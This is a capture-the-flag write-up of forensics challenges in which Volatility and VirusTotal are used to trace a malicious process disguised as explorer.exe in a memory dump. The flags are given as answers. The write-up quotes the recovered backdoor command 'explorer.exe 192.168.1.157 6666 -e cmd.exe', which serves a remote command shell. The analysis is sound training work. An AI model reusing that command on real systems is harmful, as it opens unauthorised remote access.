Cyber Hacktics group in support of NCSAM (National Cyber Security Awareness Month) hosted a CTF on 16–17 of October. The event challenges ranged from many topics , such as traffic analysis, forensics, stegnography and so on.
This post is focused on some of the Forensics challenges. Keep in mind, for these challenges, we already know that the evil twin malware is called explorer.exe from the first challenge in this category.
So before we start , I will start with a Bonus challenge they release that involves identifying this malware, called Public Service.
Public Service (Bonus Challenge)
“There is a flag associated with the malicious process from Evil Twin on a popular site used to check malware hashes. Find and submit that flag.”
This is related to the malware you find in the Evil Twin challenge. I didn’t solved the Evil Twin challenge, but a quick summary is identify which process was duplicated to look legit. You can tell that is explorer, because once you use volatility to see where processes are coming from, there is one explorer process coming from a different path than the others.
So we know the malware is called explorer.exe . First thing we want to do is to somehow extract this file from the memory dump so we can hash it. As the challenge description mentions, we are using a popular site to check the malware hash ( Virus Total !). Volatility is the best tool for linux out there when dealing with raw memory dumps.
It has this great plugin called procdump, which allow us to extract any processes executable/files in a memory dump file.
We first run a psscan and grep for explorer so we can find all explorer.exe processes in the dump. This also give us their PIDs so we can use it to extract it (and important info for future challenges). Now, we can use procdump and extract each PID, in this case: 6096, 3100,5448,2316 . We see that 3100 fails, but that’s okay.
Now that we have all the explorer.exe executable, we can hash them all. Once we have their md5sum, it’s just as easy as copying the hash and going to virus total to see if any malware matches the same hash.
We found it! But that not the flag. Always look for information about the malware in Virus Total, and I notice there is 2 community comments on this particular malware.
One of the comments is the flag itself !
flag{h4cktober_ctf_2020_nc).
Now that we have most of the information about this malware, the other challenges in the forensics category becomes easier to deal with.
Hell Spawn 1
“What was the name of the process that spawned the malicious
explorer.exe? Submit the flag as the name and extension of the process and the PID of the process, separated by an underscore:flag{process_name.ext_PID}"
Now that we have info about the malware, these next challenges becomes easier to solve.
We are tasked to find what process spawned the malware. Volatility have this plugin that shows us the “tree” of processes. Here, we are looking for our malware PPID (Parent PID).
Using the pstree (returns [PID] [ PPID] ) plugin from volatility and grep for the information we have from above, we can identify the malware and what PPID spawn it.
Now , we know that PPID 3944 spawn our malware. We can use the same command and grep for that PPID and see what process is:
We see that cmd.exe is 3944, and right below, explorer.exe shows as part of the search.
flag{cmd.exe_3944}
Commands
“What was the command used with the malicious
explorer.exe? Submit the entire command as the flag:flag{program.exe --options argument}.”
Once again, using volatility, we can use its plugin called cmdline to see all the commands executed in the memory dump file.
Having the information above about the malware, we can use this plugin and grep for the malware.
We have two commands here. The command we are looking for is : explorer.exe 192.168.1.157 6666 -e cmd.exe . That seems to be the command we are looking for. The command before, seems to be setting up a backdoor with explorer.exe instead.
flag{explorer.exe 192.168.1.157 6666 -e cmd.exe}
Hell Spawn 2
“What is the MD5 hash of the malicious
explorer.exefile from Evil Twin?”
This challenge was somewhat a “copy” of Public Service, if you did that one first. We already have the flag in hands. If you refer back to Public Service, we had to find the md5 hash of the malware and find the flag in Virus Total.
So, the approach we took was somewhat “reversed,” because if you done the previous challenges before the public service, you would still have all the info to get the malware.
So, to quickly repeat the process, in a different way, by now we have the malware PID and name, and we can make a more precise search for it:
Now, our next step would be to extract that specific process. Using procdump from volatility, we want to get the processes with the PID 5448:
Once we have the file, we can hash it :
There we have it.
flag{360b48f831d9beb41544b45d0aa66b8a}
